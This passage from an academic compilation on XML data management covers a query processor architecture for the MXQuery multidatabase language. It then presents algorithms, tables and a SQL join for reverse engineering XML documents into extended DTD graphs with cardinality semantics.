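        <xs:element name="ano" type="xs:gYear"/>
        <xs:element name="preco" type="xs:decimal"/>
      </xs:sequence>
      <xs:attribute name="isbn" type="xs:string"/>
    </xs:complexType>
  </xs:element>
</xs:schema>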
Figure 4. XML interface
Figure 4 presents the XML interface in more detail. Besides the mapping activity, executed by the mapping-definition component, the XML interface must translate queries expressed in the XML data model into the native data model of the local data source. This task is carried out by the query translator. The last component of the XML interface is the result translator, which executes the inverse function of the query translator, since it presents the query result in XML format.
QUERY PROCESSOR The first step executed by the QP is to check the syntax and semantics of the MXQuery expression, and to generate an expression tree (representing the original query). In Figure 5, one can identify two components responsible for executing this first step. The first one makes the syntax verification,
Figure 5. QP-generated products
comparing the syntax analysis tree to the MXQuery grammar. If the query is valid, the second component verifies the existence of the objects in the metadata catalog. Finally, if all objects exist and were correctly specified, an expression tree of the global query is generated. The global optimizer simplifies the original query, to improve performance, by analyzing different logical query plans. Such query plans are obtained by applying transformation rules that were specified by the query language algebra. In a conventional database, the query processor must define the physical query plan to be executed; however, when integrating multiple databases, data availability is not known before the query execution. Such information could change the physical query plan (Ozcan, Nural, Koksal, & Evrendilek, 1997). Furthermore, the MDBS does not have all the statistical information about the data sources; consequently, choosing a better physical query plan before the partial results are available is a complex task. The subquery generator uses the simplified expression tree to generate XQuery subqueries. At least one XQuery subquery will be generated for each data source. Since XQuery expressions can be simplified by using the formal specifications proposed in Draper et al. (2003), there is a two-way flow between the global optimizer and the subquery generator. Thus, the interaction between these two processes defines the generation of five products.

1. Queried sources: This is a list of all data sources that were referenced in the global query. This information will be used by the location processor, the query processor, and the query postprocessor.

2. Optional sources: The MXQuery Language allows classifying the data sources into two distinct groups: mandatory data sources and nonmandatory (optional) data sources. If an optional data source is unavailable, the query is performed anyway. In this case, the result tree could be different. The list of optional data sources is queried each time an unavailable data source is detected. If the data source is in the list of optional sources, the query will be performed even though it is unavailable.

3. XQuery subquery: At least one simplified XQuery subquery will be generated for each data source.

4. Correspondence assertions: A list of all correspondence assertions is generated (Spaccapietra, Parent, & Dupont, 1992). The correspondence assertions define rules for conflict resolution that were extracted from the MXQuery query.

5. Document-constructor model: A document is generated that specifies the transformations and constructions that should be done on the original elements to obtain the result document.
The idea behind the generation of products from the MXQuery query is to permit the generation of less complex XQuery subqueries. The XML element transformation and integration-conflict resolution are done only by the integration architecture. Thus, the local data sources do not need to expend any effort to present their results. Then, the QPp will use the products originated by the QP to build the expected result. In order to send subqueries to the corresponding data sources, it is necessary to replace the logical reference used to identify the data source with its physical location. The location processor executes this task. It queries the MDBS repository, extracts the required information, and replaces the logical reference. Finally, the QP sends the subqueries to the corresponding XML interfaces and expects an acknowledgment signal. After an interval UT, if the acknowledgment signal has not arrived at the QP, the QP resends the query. The QP tries to send the subquery during an interval UT'; after that, the QP executes a discard operation
or cancels the query execution according to the following criteria. The QP will execute a discard operation if the unavailable data source is part of the optional source list; references to this data source will be excluded. Thus, integration rules and element constructions that reference such data sources are discarded as well. The QP will perform a cancel operation if the unavailable data source is not part of the optional source list. The QP sends an error message to the QPp and abort messages to the remaining XML interfaces.
CONCLUSION

This chapter proposes an extension to the XQuery Language, called MXQuery. The key goal is to use MXQuery as a multidatabase language for integrating heterogeneous data sources on the Web. The proposed language provides the necessary support for integrating a variable number of data sources with different degrees of autonomy. MXQuery solves problems of data integration, such as semantic heterogeneity, and copes with incomplete information. Furthermore, an architecture for processing queries over multiple heterogeneous databases available on the Web is described. The idea is to process MXQuery expressions by means of the proposed architecture.
REFERENCES

Abiteboul, S., Segoufin, L., & Vianu, V. (2001). Representing and querying XML with incomplete information. Proceedings of the 20th ACM SIGMOD-SIGACT-SIGART Symposium on Principles of Database Systems (pp. 150-161).

Boag, S., Chamberlin, D., Fernandez, M., Florescu, D., Robie, J., Siméon, J., et al. (2003). XQuery 1.0: An XML query language (work in progress). Retrieved November 12, 2003, from http://www.w3.org/TR/xquery/

Bouganim, L., Fabret, F., Mohan, C., & Valduriez, P. (2000). A dynamic query processing architecture for data integration. IEEE Data Engineering Bulletin, 23(2), 42-48.

Bray, T., Paoli, J., Sperberg-McQueen, C., & Maler, E. (2000). Extensible markup language (XML) 1.0 (2nd ed.). Retrieved September 19, 2001, from http://www.w3.org/TR/REC-xml

Brayner, A., & Aguiar Moraes Filho, J. de. (2003). Sharing mobile databases in dynamically configurable environments. In J. Eder & M. Missikoff (Eds.), Advanced information systems engineering (pp. 724-737). Klagenfurt, Austria.

Chamberlin, D., Robie, J., & Florescu, D. (2000). Quilt: An XML query language for heterogeneous data sources. The World Wide Web and Databases: Third International Workshop WebDB2000, 1-25.

Chen, J., DeWitt, D. J., Tian, F., & Wang, Y. (2000). NiagaraCQ: A scalable continuous query system for Internet databases. Proceedings of the 2000 ACM SIGMOD International Conference on Management of Data (pp. 379-390).

Das, S., Shuster, K., & Wu, C. (2002). ACQUIRE: Agent-based complex query and information retrieval engine. Proceedings of the 1st International Joint Conference on Autonomous Agents and Multiagent Systems (pp. 631-638).

Domenig, R., & Dittrich, K. (2000). A query based approach for integrating heterogeneous data sources. Proceedings of the 9th International Conference on Information and Knowledge Management (pp. 453-460).

Draper, D., Fankhauser, P., Fernández, M., Malhotra, A., Rose, K., Rys, M., et al. (2003). XQuery 1.0 and XPath 2.0 formal semantics (working draft). Retrieved February 20, 2004, from http://www.w3.org/TR/xquery-semantics/

Elmagarmid, A., Bouguettaya, A., & Benatallah, B. (1998). Interconnecting heterogeneous information systems. Kluwer Academic Publishers.

Elmagarmid, A., Rusinkiewicz, M., & Sheth, A. (1999). Management of heterogeneous and autonomous database systems. San Francisco: Morgan Kaufmann Publishers.

Fallside, D. (2001). XML schema part 0: Primer (W3C recommendation). Retrieved September 21, 2001, from http://www.w3.org/TR/xmlschema-0/

Goldman, R., & Widom, J. (2000). WSQ/DSQ: A practical approach for combined querying of databases and the Web. Proceedings of the 2000 ACM SIGMOD International Conference on Management of Data (pp. 285-296).

Grant, J., Litwin, W., Roussopoulos, N., & Sellis, T. (1993). Query languages for relational multidatabases. VLDB Journal, 2, 153-171.

Krishnamurthy, R., Litwin, W., & Kent, W. (2001). Language features for interoperability of databases with schematic discrepancies. ACM SIGMOD Record, 20(2), 40-49.

Litwin, W., Abdellatif, A., Zeroual, A., Nicolas, B., & Vigier, P. (1989). MSQL: A multidatabase language. Information Sciences, 49, 59-101.

Manolescu, I., Florescu, D., & Kossman, D. (2001). Answering XML queries over heterogeneous data sources. Proceedings of the 27th International Conference on Very Large Databases (pp. 241-250).

Missier, P., & Rusimkiewicz, M. (1995). Extending a multidatabase manipulation language to resolve schema and data conflicts. Database Applications Semantics: Proceedings of the Sixth IFIP TC-2 Working Conference on Data Semantics (pp. 93-115).

Ozcan, F., Nural, S., Koksal, P., & Evrendilek, C. (1997). Dynamic query optimization in multidatabases. Bulletin of the IEEE Computer Society Technical Committee on Data Engineering, 20(3), 38-45.

Özsu, M., & Valduriez, P. (1999). Principles of distributed database systems (2nd ed.). Upper Saddle River, NJ: Prentice-Hall.

Robie, J., Chamberlin, D., & Florescu, D. (2000). Quilt: An XML query language. Proceedings of XML Europe 2000. Retrieved from http://www.gca.org/papers/xmleurope2000/papers/s0801.html

Sattler, K., Conrad, S., & Saake, G. (2000). Adding conflict resolution features to a query language for database federations. Proceedings of the 3rd International Workshop on Engineering Federated Information Systems (pp. 41-52).

Spaccapietra, S., Parent, C., & Dupont, Y. (1992). Model independent assertions for integration of heterogeneous schemas. VLDB Journal, 1, 81-126.

Tomasic, A., Raschid, L., & Valduriez, P. (1996). Scaling heterogeneous databases and the design of Disco. Proceedings of the 16th IEEE International Conference on Distributed Computing Systems (pp. 449-457).

XDK: Oracle XML developer's kit for PL/SQL. (2003). Retrieved October 22, 2003, from http://otn.oracle.com/tech/xml/xdk_plsql/index.html

XQuery 1.0 formal semantics. (n.d.). Retrieved from http://www.w3c.org/TR/query-semantics/
APPENDIX A

Document: d1.xml (bookstore B1). Data values appearing in the listing: Fundamentals of Database Systems, Elmasri, Navathe, 1994, 54.00, Princípios de SBDs Distribuídos, Özsu, 013, Valduriez, A First Course in Database Systems, Garcia-Mollina, Prentice Hall, Ullman, 45.00, Widom, 2001, 352, Campus, Database System Implementation, 110.00, Garcia-Mollina.

Document: d2.xml (bookstore B2). Data values appearing in the listing: Ullman, Widom, 053, 1999, 50.00.
This work was previously published in Web Data Management Practices: Emerging Techniques and Technologies, edited by A. Vakali and G. Pallis, pp. 199-219, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 8.7
Reverse Engineering from an XML Document into an Extended DTD Graph

Herbert Shiu, City University of Hong Kong, Hong Kong
Joseph Fong, City University of Hong Kong, Hong Kong
ABSTRACT

The extensible markup language (XML) has become a standard for persistent storage and data interchange via the Internet due to its openness, self-descriptiveness, and flexibility. This article proposes a systematic approach to reverse engineer arbitrary XML documents to their conceptual schema, extended DTD graphs, which are DTD graphs with data semantics. The proposed approach not only determines the structure of the XML document, but also derives candidate data semantics from the XML element instances by treating each XML element instance as a record in a table of a relational database. One application of the determined data semantics is to verify the linkages among elements. Implicit and explicit referential linkages among XML elements are
modeled by the parent-children structure and ID/IDREF(S), respectively. As a result, an arbitrary XML document can be reverse engineered into its conceptual schema in an extended DTD graph format.
INTRODUCTION

As the extensible markup language (XML; Bray, Paoli, Sperberg-McQueen, Maler, & Yergeau, 2004) has become the standard document format, the chance that users have to deal with XML documents with different structures is increasing. If the schema of the XML documents, in the form of a document type definition (DTD; Bosak, 1998), is given or can be derived from the XML documents right away (Kay, 1999; Moh, Lim, & Ng, 2000), it is easier
to study the contents of the XML documents. However, the formats of these schemas are hard to read and not very user friendly. XML has been the common format for storing and transferring data between software applications and even business parties as most software applications can generate or handle XML documents. For example, a common scenario is that XML documents are generated and based on the data stored in a relational database; there have been various approaches for doing so (Fernandez, Morishima, & Suciu, 2001; Thiran, Estiévenart, Hainaut, & Houben, 2004). The sizes of XML documents that are generated based on the data stored in databases can be very large. Most probably, these documents are stored in a persistent storage for backup purposes as XML is the ideal format that can be processed by any software applications in the future. In order to handle the above scenario, it is possible to treat XML element instances in an XML document as individual entities, and the relationships from the different XML element types can be determined by reverse engineering them for their conceptual models, such as extended DTD graphs with data semantics. As such, users can have a better understanding of the contents of the XML document and further operations with the XML document become possible, such as storing and querying (Deutsch, Fernandez, & Suciu, 1999; Florescu & Kossmann, 1999; Kanne & Moerkotte, 2000). This article proposes several algorithms that analyze XML documents for their conceptual schema. Two main categories of XML documents exist: data centric and narrative. As the contents of narrative XML documents, such as DocBook (Stayton, 2008) documents, are mainly unstructured and their vocabulary is basically static, the necessity of handling them as structured contents and reverse engineering them into conceptual models is far less than that of handling data-centric ones. Therefore, this article will concentrate on data-centric XML documents.
Referential Integrity in XML Documents

XML natively supports one referential integrity mechanism, which is the ID/IDREF(S) type of attribute linkages. In every XML document, the value of an ID type attribute appears at most once, and the value of an IDREF(S) attribute must refer to one ID type attribute value. An IDREF(S) type attribute can refer to any XML element in the same document, and each XML element can define at most one ID type attribute. Due to the nature of ID/IDREF(S) type attributes in XML documents, relationships among different XML element types can be realized, and it is possible to use them to implement data semantics. This article will discuss the various data semantics and the possible ways to implement them. The algorithms presented are based on observations of the following common XML document structures:

1. Due to the nested structure of an XML document (the relationship between a parent element and its child elements), the child elements implicitly refer to their parent element.
2. For an IDREF or IDREFS type attribute, the defining element refers to the element(s) whose ID type attribute carries the referred value. Such linkages are similar to foreign keys in a relational database. The two associated element types are considered to be linked by an explicit linkage.
3. As an IDREFS type attribute can refer to more than one element, there is a one-to-many cardinality between the referring element type and the referred element type(s).
The schema of an XML document can restrict the order of the XML elements, which may be significant; the order depends on the intentions of the original XML document designer. For example, two XML documents with their corresponding DTDs are shown in Table 1. The two XML documents in Table 1 store the same data, namely the data of two couples. In the first one, the couple elements use two IDREF type attributes to denote the corresponding husband and wife elements. However, the use of ID/IDREF cannot ensure that a particular husband or wife element is referred to by only one couple element. In the second XML document, the DTD restricts the husband and wife elements to exist as a pair. Furthermore, the use of the ID type attributes hid and wid ensures that any husband or wife element instance appears in the document at most once.

Table 1. Two equivalent XML documents that can represent the same data (the DTD and XML document of each variant)
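As an illustration of the two variants, the documents could look roughly as follows; the exact markup is an assumption based on the description, and only the element names couple, husband, and wife and the attributes hid and wid are taken from the text. In the first variant, a couple element refers to its husband and wife elements through IDREF attributes:

<couples>
  <husband hid="h1">...</husband>
  <wife wid="w1">...</wife>
  <couple husband="h1" wife="w1"/>
</couples>

In the second variant, a declaration such as <!ELEMENT couple (husband, wife)> forces each couple to contain its husband and wife elements directly as a pair:

<couples>
  <couple>
    <husband hid="h1">...</husband>
    <wife wid="w1">...</wife>
  </couple>
</couples>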
Extended DTD Graph

As XML element instances are treated as individual entities, the relationships of the element types are related not only to the structure of the XML document, but also to the linkages among the different types. As such, a DTD cannot clearly indicate the relationships. An extended DTD graph for XML is proposed to add data semantics into a DTD graph, which is an excellent way of presenting the structure of an XML document, so that the data semantics can be clearly identified. In order to visualize the data semantics determined from the XML document with its optional schema, this article will
provide the notations to be used for presenting the various data semantics. This article uses the authors' notation of the extended DTD graph for presenting the structure and the data semantics of the elements:

1. Vertexes drawn as squares represent elements, and vertexes drawn as circles represent the occurrence operators (?, +, and *) and the selection operator (|).
2. Attributes and simple elements are omitted from the graph as they specify a particular attribute of their defining and parent elements, respectively.
3. Data semantics, other than one-to-one and one-to-many cardinality relations, are presented in the graph as arrows pointing from the referring element to the referred element, with suitable descriptions as legends.
Based on the above criteria, it is possible to consider only the ELEMENT declarations for constructing the extended DTD graph. Three types of ELEMENT declarations can be identified, as follows:

1. An ELEMENT declaration defines subelements only.
2. An ELEMENT declaration involves subelements and #PCDATA as its contents.
3. An ELEMENT declaration defines #PCDATA as its contents only.
The above three types correspond to the following three examples.
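Declarations of the following forms would fall under the three types, respectively; the element names are illustrative assumptions (chosen to match Figure 1) rather than the original examples, and the three lines are separate examples, not a single DTD:

<!ELEMENT PARENT (CHILD1+, CHILD2*)>
<!ELEMENT PARENT (#PCDATA | CHILD1)*>
<!ELEMENT CHILD1 (#PCDATA)>

The first declaration is the kind visualized as a tree in Figure 1, the second mixes #PCDATA with subelements, and the third allows character data only.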
For each ELEMENT declaration of the first type, the content model expression can be tokenized as individual elements, occurrence indicators, and sequence separators (,), and represented as a tree structure with the element name as the root node. For example, the first example above can be visualized as a tree diagram. In Figure 1, the sequence (,) is implied in the diagram. DTDs mostly contain more than one ELEMENT declaration, but each element type can only appear once. Therefore, to construct the complete DTD graph for a DTD, the tree structures of all ELEMENT declarations in a DTD are constructed first and are eventually merged by replacing each subelement node in a tree with the tree structure
of that element. Such merging is repeated until there is only one tree structure or all subelements have been replaced with their corresponding tree structures.

Figure 1. A sample extended DTD graph (a PARENT element connected through a sequence node (,) and the occurrence operators + and * to the CHILD1 and CHILD2 elements)
Cardinality and Participation

Element types are visualized as rectangles in the graph, and a cardinality relationship is presented as an arrow pointing from the referring element type to the referred element type, with a double line and a single line for total participation and partial participation, respectively. The cardinality types, including one to one (1/1), one to many (1/m), many to one (m/1), and many to many (m/m), are shown as legends of the arrows. If the cardinality relationship is implemented as explicit ID/IDREF(S) linkages, the name of the ID type attribute of the referring element is appended to the legend, such as 1/m (parent_id). To distinguish explicit linkages from implicit linkages, cardinality relationships due to ID/IDREF(S) type attributes are shown as arrows with curved lines. Table 2 presents the eight possible combinations of arrows and legends.
Table 2. The arrows illustrating the cardinalities (1/1, 1/m, m/1, and m/m), each with total and partial participation, giving eight combinations in all

N-ary Relationship

An n-ary relationship is implemented as a particular element type involved in more than two binary relationships. To represent such a relationship, a diamond-shaped vertex is used for such element types. Figure 2 presents a sample diagram with an n-ary relationship.

Figure 2. A sample diagram with an n-ary relationship (a diamond-shaped relation vertex connected to element1, element2, and element3)
Aggregation Relationship

An aggregation relationship denotes that the involved element types must exist as a unity. In Figure 2, an aggregation exists as the defining characteristic of mandatory participation between parent and child elements. As such, a rectangle is to be drawn enclosing all involved element types.

RELATED WORK

In order to have a complete picture of the reasons behind the algorithms for determining various data semantics, this article explains the existing approaches of constructing XML documents, especially those exported from relational databases.

The Determination of Data Semantics from XML Documents

One approach exists that can reverse engineer data semantics from XML documents (Fong & Wong, 2004), but the algorithm maps some predefined templates of document structures to data semantics, and it can only be implemented with DOM (World Wide Web Consortium [W3C], 2003), which needs to read the entire XML document into memory and is therefore inappropriate for huge documents. The methodology presented in this article, however, determines basic candidate data semantics from arbitrary XML documents with SAX (W3C, 2004), which is applicable to XML documents of any size. Some of the determined data semantics may not be the intentions of the original writer and need user supervision for verification.

The Determination of XML Schema

There is some existing work concerning the extraction of schema, such as DTD, from XML documents (Chidlovskii, 2001; Min, Ahn, & Chung, 2003). The outputs of these algorithms are schemas that can validate the XML documents. However, the derived schemas provide no semantic interpretation other than the containment structures of the XML documents. The algorithms proposed in this article concern the determination of data semantics from the XML element instances rather than simply the XML schema among XML elements. Compared to the approach proposed by Goldman and Widom (1997) that directly manipulates semistructured databases, such as an XML document, the algorithm proposed here provides the user with a clear picture of the data semantics from the XML element instances before further manipulating them.

The Implementation of Inheritance among XML Elements

Schema for object-oriented XML (SOX; W3C, 2005) introduced the idea of element and attribute inheritance, which enables an element to extend another element so that the derived element has all attributes defined by the base element together with its own new attributes. Due to the limitations and low extensibility of DTD (Sahuguet, 2000), XML schema definition (XSD; Sperberg, 2000) is becoming the popular replacement schema for DTD. Unlike DTD, XSD is an XML document itself and can define more restrictive constraints and clearer definitions of the XML documents to be validated. In other words, the capabilities of XSD for defining structures and data types are a superset of those of DTD. As such, there has been research and
software for converting DTD to XSD (Mello & Heuser, 2001; W3C, 2000). There are other alternative schemas, such as RELAX NG (RELAX NG, 2003) and Schematron (Shanmugasundaram et al., 2008). Lee and Chu (2000a) evaluated six common XML schemas, including DTD and XSD. As the others are not as popular as DTD and XSD, they are not discussed in this article. By constructing a graph in which vertexes are placed for elements, and the elements involved in a parent-child relation (defined by an ELEMENT declaration in the DTD) are connected with edges, it is possible to derive a graphical representation of the DTD that is commonly known as a DTD graph. Up to now, there has been no formal standard for DTD graphs, and various researchers are using their own conventions, as in Klettke, Schneider, and Heuer (2002), Shanmugasundaram et al. (2008), Lu, Sun, Atay, and Fotouhi (2003), and Böttcher and Steinmetz (2003); the graph introduced in Funderburk, Kiernan, Shanmugasundaram, Shekita, and Wei (2002) is the first one that was denoted as a DTD graph. There is a graphical representation of XSD (Fong & Cheung, 2005) that derives an XML conceptual schema of an XML tree model from an XML schema of XSD. Its approach is different from this article's approach, which derives an extended DTD graph from an XML document. As the conventions of most graphs for presenting the structure of an XML document are applicable to different schema languages, the graph is also known as a semantic graph (An, Borgida, & Mylopoulos, 2005). Some researchers proposed other graphical representations of XML schemas, such as the use of UML (unified modeling language; Booch, Christerson, Fuchs, & Koistinen, 1999).
The Application of Extended DTD Graphs

A data graph is a DTD in a graph. Zhao and Siau (2007) described DTD as a good common data model when the majority of data sources are XML sources for the interoperability between relational databases and XML databases. Reverse engineering an XML document into a DTD graph is similar to data mining an XML document into a data tree (Zhang, Liu, Ling, Bruckner, & Tija, 2006). The former is a database schema while the latter is internal data in a tree structure. Trujillo and Luján-Mora (2004) demonstrated that a DTD can be used to define the correct structure and content of an XML document representing the main conceptual multidimensional model for data warehouses. Compared to the approach proposed by Goldman and Widom (1997) that directly manipulates semistructured databases such as an XML document, the algorithm proposed in this article enables the user to have a clear picture of the data semantics from the XML element instances before further manipulating them. Table 3 provides a comparison between the proposed algorithms and other existing approaches.

Table 3. A comparison between the proposed and other existing approaches
Input: proposed approach - XML document with optional schema; other approaches - XML document.
Output: proposed approach - conceptual schema with data semantics; other approaches - schema without data semantics.
Completeness: proposed approach - all common data semantics can be determined; other approaches - schemas that can validate the XML document can be derived.
User friendliness: proposed approach - the algorithms can be implemented with a user-friendly GUI (graphical user interface), such as the prototype; other approaches - commercial products exist that provide a user-friendly GUI.
Performance: proposed approach - good; other approaches - not available, as no mathematical proofs were provided.
REVERSE-ENGINEERING METHODOLOGY

There are basically two different definitions in a DTD: ELEMENT and ATTLIST. Each ATTLIST definition defines the attributes of a particular element, whereas ELEMENT defines its possible containments. Each ELEMENT definition can be represented in a tree structure with the element name as the root and its child subelements as leaves; there must be another ELEMENT definition for each of the child elements. It is not mandatory to define the ELEMENT declaration prior to all its child elements, and it is actually uncertain which element is the root element of the corresponding XML documents. The root element of the XML document is defined by the DOCTYPE declaration before the root-element start tag.

Implementations of Various Data Semantics in XML

The following subsections provide all possible implementations of various data semantics, some of which are consistent with those proposed by other researchers (Lee, 2000; Lee, Mani, & Chu, 2003).
Cardinalities

One-to-many cardinalities can be realized by both explicit and implicit referential linkages. Through implicit referential linkages, a parent element can have child elements of the same type; for example, a PURCHASE_ORDER element can contain a number of PURCHASE_ORDER_LINE child elements. The parent element PURCHASE_ORDER and the child elements PURCHASE_ORDER_LINE are then implicitly in a one-to-many relationship. If the occurrences of the child element PURCHASE_ORDER_LINE are at most one for all PURCHASE_ORDER elements, they are in a one-to-one relationship instead.

If the schema of the XML document is given, it can specify the ID/IDREF(S) type attributes. If an XML element defines an IDREF attribute and all such elements refer to the same element type, there is a one-to-many relationship between the referred and referring XML elements. Sample DTD and XML documents of this kind are shown in Figure 3.

Figure 3. A many-to-one cardinality implemented by an IDREF type attribute

For explicit referential linkages, to determine whether the cardinality is one to one or one to many, it is necessary to scan the entire XML document. An XML element type may be involved in more than one one-to-many relationship; in other words, all elements of such an XML element type define more than one linkage. For example, if an XML element type defines an IDREF(S) type attribute, all elements of that XML element type actually define two linkages: one implicit linkage by the nested structure and one explicit linkage by the IDREF(S) type attribute. If the two linkages are both one-to-many relationships, the two element types referred to by such a referring element type can be considered to be in a many-to-many relationship. The XML document in Figure 4 illustrates such a many-to-many relationship: for an XML element type that defines two linkages and hence two one-to-many relationships, the two referred XML element types can be considered to be in a many-to-many relationship.
The linkages from the XML elements in an XML document are identified by the referring element name, linkage name, and the referred element name. The algorithm shown in Figure 6 is used to determine the linkages in Table 4. Figure 5 illustrates the meanings of the four attributes. There are eight XML elements in the document and there is only one implicit linkage from them. The values of the above four linkage attributes for such implicit linkage are given in Table 5. According to the combination of the values of the four attributes, it is possible to determine the cardinality data semantics for the involved elements. The rules are shown in Table 6. The algorithm is composed of two passes of parsing of the same XML document. The first pass assigns a synthetic element identity to each XML element in the document and determines all ID type attribute values and their corresponding element types. For the second pass, the XML document is traversed again and the linkages of each XML element are investigated and their attributes are stored. Finally, the stored linkage attributes are consolidated to give the four linkage attributes mentioned above and in Table 4. The algorithm shown in Figure 6 can determine whether the XML document is valid, in particular, whether a nonexisting ID value is referred by an IDREF(S) type attribute. If the XML document is valid, three tables can be obtained: ReferringInfo, ReferredInfo, and ElementNameCount. The key for the former two tables is the composite key (RGE, RDE, L), that is, the referring element name, the referred element name, and the linkage name, whereas the key for ElementNameCount is simply the element name. With three such tables, it is possible to derive the linkage attributes as shown in Table 4. The complete algorithm is presented in Figure 6, which is followed by a list of definitions for the variables to be used.
Figure 4. A many-to-many cardinality implemented by an element type with two IDREF type attributes
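The pattern of Figure 4 can be sketched as follows; the element and attribute names (author, book, authorship, aid, bid, aref, bref) are illustrative assumptions, not the names used in the original figure:

<!ELEMENT library (author*, book*, authorship*)>
<!ELEMENT author (#PCDATA)>
<!ATTLIST author aid ID #REQUIRED>
<!ELEMENT book (#PCDATA)>
<!ATTLIST book bid ID #REQUIRED>
<!ELEMENT authorship EMPTY>
<!ATTLIST authorship aref IDREF #REQUIRED
                     bref IDREF #REQUIRED>

<library>
  <author aid="a1">...</author>
  <author aid="a2">...</author>
  <book bid="b1">...</book>
  <authorship aref="a1" bref="b1"/>
  <authorship aref="a2" bref="b1"/>
</library>

Each authorship element refers to one author and one book through its two IDREF attributes; taken together, the authorship instances relate the author and book element types in a many-to-many fashion.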
Table 4. The attributes and their sources for determining data semantics

MaxReferring - The maximum number of referred elements referred to by a single referring element. Value: obtained from ReferringInfo with key (RGE, RDE, L).
MaxReferred - The maximum number of referring elements that refer to the same referred element with the same linkage type. Value: obtained from ReferredInfo with key (RGE, RDE, L).
SumReferring - The number of referring elements that possess the linkage. Value: obtained from ReferringInfo with key (RGE, RDE, L).
NumberElements - The number of referring elements in the document. Value: obtained from ElementNameCount with key RGE.
Figure 5. MaxReferring, MaxReferred, SumReferring, and NumberElements example (a tree of eight message elements with ID values ID1 to ID8; MaxReferring = 1, MaxReferred = 3, SumReferring = 7, NumberElements = 8)
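A document matching the explanations in Table 5 is, for example, the following; whether the original figure expressed the linkages by nesting, by IDREFS attributes, or both is not shown here, and the id attribute is assumed to be of type ID:

<message id="ID1">
  <message id="ID2">
    <message id="ID3"/>
    <message id="ID4"/>
    <message id="ID5"/>
  </message>
  <message id="ID6">
    <message id="ID7"/>
    <message id="ID8"/>
  </message>
</message>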
Table 5. Descriptions of variables in reverse-engineering algorithms

MaxReferring = 1: All linkages are implicit, and each child element has only one implicit parent element.
MaxReferred = 3: The root message element with attribute ID value ID1 is referred to by two subelements (with attribute ID values ID2 and ID6). The message element with attribute ID value ID2 is referred to by three subelements (with attribute ID values ID3, ID4, and ID5). The message element with attribute ID value ID6 is referred to by two subelements (with attribute ID values ID7 and ID8). Therefore, the value of MaxReferred is 3.
SumReferring = 7: Except for the root message element with attribute ID value ID1, all other message elements define such a linkage. The value of SumReferring is therefore 7.
NumberElements = 8: There are eight message elements.
Table 6. Matrix for determining cardinality (one to one, one to many, many to one, or many to many) and participation based on the determined linkage attributes
The operation in Figure 6 can be represented by the following statement in SQL (structured query language):

SELECT ReferringInfo.RGE, ReferringInfo.RDE, ReferringInfo.L,
       ReferringInfo.MaxReferring, ReferredInfo.MaxReferred,
       ReferringInfo.SumReferring, ElementNameCount.NumberElements
FROM ReferringInfo
  INNER JOIN ReferredInfo
    ON ReferringInfo.RGE = ReferredInfo.RGE
   AND ReferringInfo.RDE = ReferredInfo.RDE
   AND ReferringInfo.L = ReferredInfo.L
  INNER JOIN ElementNameCount
    ON ReferringInfo.RGE = ElementNameCount.E
Once the four attributes of a linkage are determined, the data semantics can be determined by using the matrix shown in Table 6. According to the determined one-to-one and one-to-many relationships, it is then possible to consolidate the related ones into many-to-many and n-ary relationships. As mentioned above, if an XML element type defines two linkages that are determined to be many-to-one cardinalities, the two referred XML element types are considered to be in a many-to-many relationship. Similarly, if an XML element type defines more than two linkages that are determined to be many-to-one cardinalities, the referred XML element types are considered to be in an n-ary relationship. Therefore, based on the one-to-many cardinalities determined by the previous algorithm, the many-to-many and n-ary relationships can be determined, and the algorithm is shown in Figure 7.
Figure 6. The algorithm for determining linkage information by traversing the XML document

Variable definitions:
EID - The current element ID. While processing the XML document sequentially, EID determines the ID to be assigned to each individual element encountered.
E - The current element to be handled.
A - An attribute of the current element to be handled.
AV - The attribute value of attribute A.
L - A linkage of the current element. It can be an implicit linkage with its parent element or an explicit linkage with an IDREF(S) type attribute. A non-root element without an IDREF(S) attribute has only one implicit linkage to its parent element; otherwise, the element can have more than one linkage, one implicit linkage and at least one explicit linkage.
Lvalue - The element ID of the linkage L for the current element E. If L is an implicit linkage, Lvalue is the element ID of the parent element of E. Otherwise, Lvalue is the IDREF attribute value, and the value should be an ID type attribute value of an element in the same document.
NG - The number of referring elements of the same element name that refer to the same referred element with the same link.
RGE - The referring element of a link.
RDE - The referred element of a link.
Pass One:
Let EID = 1;
Repeat until all XML document elements are read
    Let E be the current element to be processed
    If ∃ record in TableElementNameCount where ElementName = element name of E
        Get record (ElementName, NumberElement) from TableElementNameCount;
        Increment NumberElement by 1;
        Update (ElementName, NumberElement) into TableElementNameCount;
    Else
        Add (ElementName, 1) into TableElementNameCount;
    End If
    Add (EID, ElementName) into TableElementIDName;
    If there exists an ID type attribute A of element E with attribute value AV
        Add (AV, ElementName) into TableElementIDName;
    End If
    Increment EID by 1;
    Navigate to the next element E in the XML document

Pass Two:
Repeat until all XML document elements are read
    Let RGE be the current element to be handled
    For each linkage, L, of RGE
        For each linkage value, Lvalue, of linkage L of RGE
            Get record (EID, ElementName) from TableElementIDName where the primary key value is Lvalue
            If no such record exists in TableElementIDName
                The XML document is invalid
            Else
                Let RDE = ElementName of the record obtained from TableElementIDName
            End If
            Get record (RGE, RDE, L, Lvalue, ND) from TableRawReferredInfo for primary key (RGE, RDE, L, Lvalue);
            If the record exists
                Increment ND of the record by 1;
                Update the record in TableRawReferredInfo;
            Else
                Add record (RGE, RDE, L, Lvalue, 1) to TableRawReferredInfo;
            End If
            For each referred element type, RDE
                Let NG = number of RDE referred by this linkage, L;
                Get record (RGE, RDE, L, MaxReferring, SumReferring) from TableReferringInfo for primary key (RGE, RDE, L);
                If the record exists
                    If NG > MaxReferring of the record
                        Update MaxReferring of the record to be NG
                    End If
                    Increment SumReferring of the record by 1;
                    Update the record in TableReferringInfo;
                Else
                    Add record (RGE, RDE, L, NG, 1) to TableReferringInfo;
                End If
            End For
        End For
    End For
    Navigate to the next element RGE in the XML document
Consolidate the records with the same combination of (RGE, RDE, L) in TableRawReferredInfo; let MaxReferred = the maximum of the ND values of all such records;
Add record (RGE, RDE, L, MaxReferred) to TableReferredInfo;
Figure 7. The algorithm for determining many-to-many and n-ary relationships

Get the referring XML element types from the one-to-many cardinalities;
For each referring XML element type Treferring
    Get the set of XML element types, Sreferred, referred to by Treferring via explicit linkages;
    If the size of the set Sreferred = 2
        The XML element types in Sreferred are in a many-to-many relationship implemented by Treferring;
    Else If the size of Sreferred > 2
        The XML element types in Sreferred are in an n-ary relationship implemented by Treferring;
